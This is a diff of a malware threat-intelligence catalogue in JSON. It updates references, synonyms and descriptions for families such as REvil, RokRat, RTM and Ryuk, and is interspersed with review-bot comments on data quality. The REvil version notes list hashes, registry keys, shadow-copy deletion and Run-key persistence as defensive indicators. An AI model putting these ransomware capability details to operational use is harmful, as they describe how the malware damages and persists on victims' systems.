rnd_ext --> Xu7Nnkd\r\n * stat --> sMMnxpgk\r\n------------------------------------\r\nREvil 1.04\r\nMD5: 6e3efb83299d800edf1624ecbc0665e7\r\nSHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d\r\nSHA256: 
2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6\r\n* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)\r\n* Removes the folder wipe capability\r\n* Changes the REvil registry root key to SOFTWARE\\GitForWindows\r\n* Changes registry key values from --> to:\r\n * pvg --> QPM\r\n * sxsP --> cMtS\r\n * BDDC8 --> WGg7j\r\n * f7gVD7 --> zbhs8h\r\n * Xu7Nnkd --> H85TP10\r\n * sMMnxpgk --> GCZg2PXD\r\n------------------------------------\r\nREvil v1.05\r\nMD5: cfefcc2edc5c54c74b76e7d1d29e69b2\r\nSHA1: 7423c57db390def08154b77e2b5e043d92d320c7\r\nSHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea\r\n* Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence.\r\n* Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' :\r\n * SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\lNOWZyAWVv\r\n* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). 
This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done.\r\n* Changes registry key values from --> to:\r\n * QPM --> tgE\r\n * cMtS --> 8K09\r\n * WGg7j --> xMtNc\r\n * zbhs8h --> CTgE4a\r\n * H85TP10 --> oE5bZg0\r\n * GCZg2PXD --> DC408Qp4\r\n------------------------------------\r\nREvil v1.06\r\nMD5: 65ff37973426c09b9ff95f354e62959e\r\nSHA1: b53bc09cfbd292af7b3609734a99d101bd24d77e\r\nSHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e\r\n* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.\r\n* Modified handling of network file encryption. Now explicitly passes every possible \"Scope\" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type\" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.\r\n* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'\r\n* Changes registry key values from --> to:\r\n * tgE --> 73g\r\n * 8K09 --> vTGj\r\n * xMtNc --> Q7PZe\r\n * CTgE4a --> BuCrIp\r\n * oE5bZg0 --> lcZd7OY\r\n * DC408Qp4 --> sLF86MWC\r\n------------------------------------\r\nREvil v1.07\r\nMD5: ea4cae3d6d8150215a4d90593a4c30f2\r\nSHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e\r\nSHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3\r\nTBD",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004",
+ "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
+ "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/",
+ 
"https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/",
+ "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
+ "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/",
+ "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/",
+ "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/",
+ "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://asec.ahnlab.com/ko/19860/",
+ "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html",
+ "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ 
"https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/",
+ "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
+ "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.certego.net/en/news/malware-tales-sodinokibi/",
+ "https://www.secureworks.com/blog/revil-the-gandcrab-connection",
+ "https://hatching.io/blog/ransomware-part2",
+ "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html",
+ "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf",
+ 
"https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/", + "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/", + "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/", + "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/", + "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/", + "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html", + "https://community.riskiq.com/article/3315064b", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/", + "https://blog.amossys.fr/sodinokibi-malware-analysis.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/", + "https://threatintel.blog/OPBlueRaven-Part1/", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://isc.sans.edu/diary/27012", + 
"https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://securelist.com/sodin-ransomware/91473/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "https://www.kpn.com/security-blogs/Tracking-REvil.htm", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/", + "https://vimeo.com/449849549", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.youtube.com/watch?v=l2P5CMH9TE0", + "https://www.grahamcluley.com/travelex-paid-ransom/", + "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain", + "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", + "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", + "https://www.secureworks.com/research/threat-profiles/gold-southfield", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + 
"https://asec.ahnlab.com/ko/19640/", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/", + "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/", + "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos" + ], + "synonyms": [ + "Sodin", + "Sodinokibi" + ], + "type": [] + }, + "uuid": "e7698597-e0a9-4f4b-9920-09f5db225bd4", + "value": "REvil" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/" ], "synonyms": [], 
@@ -14430,11 +26572,39 @@ "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", "value": "RGDoor" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino", + "https://www.vmray.com/cyber-security-blog/rhino-ransomware-malware-analysis-spotlight/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cff6ec82-9d14-4307-9b5b-c0bd17e62f2a", + "value": "Rhino Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5f1bac43-6506-43f0-b5d6-709a39abd671", + "value": "RHttpCtrl" + }, { "description": "Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/", + "https://decoded.avast.io/threatintel/spoofing-in-the-reeds-with-rietspoof/", "https://blog.avast.com/rietspoof-malware-increases-activity" ], "synonyms": [], @@ -14448,7 +26618,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor", - "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf", + "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/" ], "synonyms": [], "type": [] 
@@ -14487,7 +26659,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf" ], "synonyms": [], "type": [] @@ -14501,7 +26674,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/" + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] 
@@ -14514,9 +26688,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms", - "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf" + "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", + "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/", + "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf", + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/" ], "synonyms": [ + "Gussdoor", "Remote Manipulator System" ], "type": [] 
@@ -14528,8 +26707,35 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", - "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/", + "https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/", + "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/", + "https://goggleheadedhacker.com/blog/post/12", + "https://twitter.com/VK_Intel/status/1121440931759128576", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" + ], + "synonyms": [ + "RobbinHood" + ], + "type": [] + }, + "uuid": "6f3469f6-7a56-4ba3-a340-f10746390226", + "value": "RobinHood" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock" ], "synonyms": [ "yellowalbatross" 
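Review bot: The rewritten Rock entry at the end of this hunk is left with only the Malpedia self-link, because the removed `rmshixdAPT-C-15-20160630.pdf` reference from securitykitten is not re-added on the new side; if the upstream export merely lost it, that sole external source should be restored rather than dropped silently. The same regression appears in the Rovnix hunk, where `https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/` vanishes while its siblings are only reordered, and in the RunningRAT hunk, which removes the McAfee gold-dragon reference and leaves that entry with no external source at all. A pre-merge check that compares per-entry `refs` counts before and after regeneration would catch this class of loss before it reaches consumers of the galaxy.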
@@ -14544,7 +26750,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader",
- "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware"
+ "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/"
 ],
 "synonyms": [],
 "type": []
@@ -14569,6 +26776,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
 "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/",
 "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/"
 ],
@@ -14582,7 +26791,8 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku",
+ "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/"
 ],
 "synonyms": [],
 "type": []
@@ -14591,21 +26801,34 @@
 "value": "Rokku"
 },
 {
- "description": "",
+ "description": "It is a backdoor commonly distributed as an encoded\r\nbinary file downloaded and decrypted by shellcode following the\r\nexploitation of weaponized documents. DOGCALL is capable of\r\ncapturing screenshots, logging keystrokes, evading analysis with\r\nanti-virtual machine detections, and leveraging cloud storage APIs\r\nsuch as Cloud, Box, Dropbox, and Yandex.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat",
 "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf",
+ "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
+ "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/",
 "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
 "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
 "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/",
+ "https://www.ibm.com/downloads/cas/Z81AVOY7",
 "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
 "https://www.youtube.com/watch?v=uoBQE5s2ba4",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
 "http://v3lo.tistory.com/24",
- "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/"
+ "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
+ ],
+ "synonyms": [
+ "DOGCALL"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5",
@@ -14685,7 +26908,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover",
- "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/"
+ "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/"
 ],
 "synonyms": [],
 "type": []
@@ -14701,12 +26925,13 @@
 "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/",
 "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0",
 "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf",
+ "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
 "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/",
- "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/",
 "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html",
- "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/",
+ "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/",
+ "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
 "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981",
- "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html"
+ "https://securelist.com/oh-what-a-boot-iful-mornin/97365"
 ],
 "synonyms": [
 "BkLoader",
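Review bot: The new ROKRAT reference list carries the same article twice, once as the context line `http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html` and once as the added `https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html`; the list should be deduplicated on a scheme-normalised URL, keeping the https form. The added description also embeds literal `\r\n` line breaks and opens with "It is a backdoor" without ever naming ROKRAT, which reads like an unedited paste from the source report; the RTM description in the `@@ -14760,13 +26987,19 @@` hunk has the same artefact, ending in `\r\n\r\n`. Since every entry's first ref points at malpedia.caad.fkie.fraunhofer.de, this text is presumably taken from that export, so the clean-up belongs upstream or a normalisation step (strip CRLF, trim whitespace) in whatever script regenerates this file.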
@@ -14719,11 +26944,12 @@
 "value": "Rovnix"
 },
 {
- "description": "",
+ "description": "RoyalCli is a backdoor which appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary. RoyalCli and BS2005 both communicate with the attacker's command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli",
 "https://github.com/nccgroup/Royal_APT",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
 "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
 ],
 "synonyms": [],
@@ -14733,11 +26959,12 @@
 "value": "RoyalCli"
 },
 {
- "description": "",
+ "description": "RoyalDNS is a DNS based backdoor used by APT15 that persistences on a system through a service called 'Nwsapagent'.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns",
 "https://github.com/nccgroup/Royal_APT",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
 "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
 ],
 "synonyms": [],
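Review bot: The added RoyalCli description speaks in the first person of its source, `The name RoyalCli was chosen by us due to a debugging path left in the binary.`, which in a shared galaxy reads as though the cluster maintainers named the family; it should be attributed, e.g. `was chosen by NCC Group`, or rephrased in the third person. The RoyalDNS description in the second hunk on this line has `persistences on a system`, which should read `persists on a system`. Both hunks are complete here; the wording most likely originates in the upstream export, so the fix should be applied there to survive the next regeneration.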
@@ -14760,13 +26987,19 @@
 "value": "Rozena"
 },
 {
- "description": "",
+ "description": "RTM Banker also known as Redaman was first blogged about in February 2017 by ESET. The malware is written in Delphi and shows some similarities (like process list) with Buhtrap. It uses a slightly modified version of RC4 to encrypt its strings, network data, configuration and modules, according to ESET.\r\n\r\n",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm",
- "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "https://www.youtube.com/watch?v=YXnNO3TipvM",
+ "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/",
+ "http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html",
+ "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/"
+ ],
+ "synonyms": [
+ "Redaman"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "e6952b4d-e96d-4641-a88f-60074776d553",
@@ -14777,7 +27010,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos",
- "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered"
+ "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -14814,8 +27047,7 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat",
- "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat"
 ],
 "synonyms": [],
 "type": []
@@ -14859,17 +27091,127 @@
 "value": "Rustock"
 },
 {
- "description": "",
+ "description": "Ryuk is a ransomware which encrypts its victim's files and asks for a ransom via bitcoin to release the original files. It is has been observed being used to attack companies or professional environments. Cybersecurity experts figured out that Ryuk and Hermes ransomware shares pieces of codes. Hermes is commodity ransomware that has been observed for sale on dark-net forums and used by multiple threat actors. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk",
- "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
+ "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/",
+ "https://community.riskiq.com/article/0bcefe76",
+ "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
